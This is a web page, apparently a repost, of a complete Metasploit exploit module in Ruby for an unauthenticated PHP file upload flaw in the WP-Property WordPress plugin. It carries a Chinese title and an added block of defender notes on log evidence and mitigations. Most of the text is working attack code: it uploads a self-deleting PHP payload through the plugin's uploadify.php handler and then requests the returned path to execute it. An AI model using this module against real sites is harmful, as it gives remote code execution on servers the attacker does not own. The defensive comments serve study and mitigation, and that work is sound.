WordPress WP-Property PHP 文件上传漏洞
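##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description).
#
# The listing on this page was interleaved with forum anti-copy noise, and the
# PhpEXE mixin name had been eaten by an emoticon filter; this is the same
# module with that noise removed. The request logic is unchanged.
#
# Review notes for defenders: the whole exchange is two HTTP requests. First a
# multipart POST to the plugin's bundled uploadify.php carrying a `Filedata`
# part whose filename ends in .php, then a GET for whatever path the handler
# echoes back in its response body. Both requests land under
# wp-content/plugins/wp-property/third-party/uploadify/ and are visible in
# web-server access logs. Removing or blocking the bundled uploadify handler,
# upgrading the plugin past the affected range, or denying PHP execution in
# upload directories each breaks the chain.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (references, payload constraints, targets) and
  # the TARGETURI option that points at the WordPress installation.
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the bundled uploadify handler with a plain GET.
  #
  # A 200 only shows that uploadify.php is reachable; nothing here fingerprints
  # the plugin version, which is why the strongest answer is Appears rather
  # than Vulnerable.
  #
  # @return [Exploit::CheckCode::Unknown] when there is no response or a non-200 status
  # @return [Exploit::CheckCode::Appears] when the handler answers with 200
  def check
    uri = target_uri.path
    # Appends in place, as the original did; the string returned by
    # target_uri.path is the one being modified.
    uri << '/' unless uri.end_with?('/')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a randomly named .php file through uploadify.php and then requests
  # the path the handler returns.
  #
  # Calls fail_with(Exploit::Failure::UnexpectedReply, ...) when the upload
  # response is missing, is not a 200, or does not mention the uploaded name.
  def exploit
    uri = target_uri.path
    uri << '/' unless uri.end_with?('/')

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # NOTE(review): unlink_self presumably makes the uploaded script delete
    # itself once it has run; confirm in the PhpEXE mixin. If so, the file may
    # be gone from disk afterwards and access logs are the durable evidence.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Two form fields: the file itself ("Filedata") and the destination
    # directory ("folder"), which is supplied by the client.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF in front of a line-initial "--_Part_" boundary marker.
    # NOTE(review): presumably a workaround for how the handler parses the
    # multipart body; verify against Rex::MIME::Message#to_s output.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The upload counts as successful only if the reply is a 200 whose body
    # contains the random file name that was just sent.
    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the next request path; it is not
    # parsed or validated beyond the name match above.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end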
不要问我这写的是什么 怎么利用 我是说msf.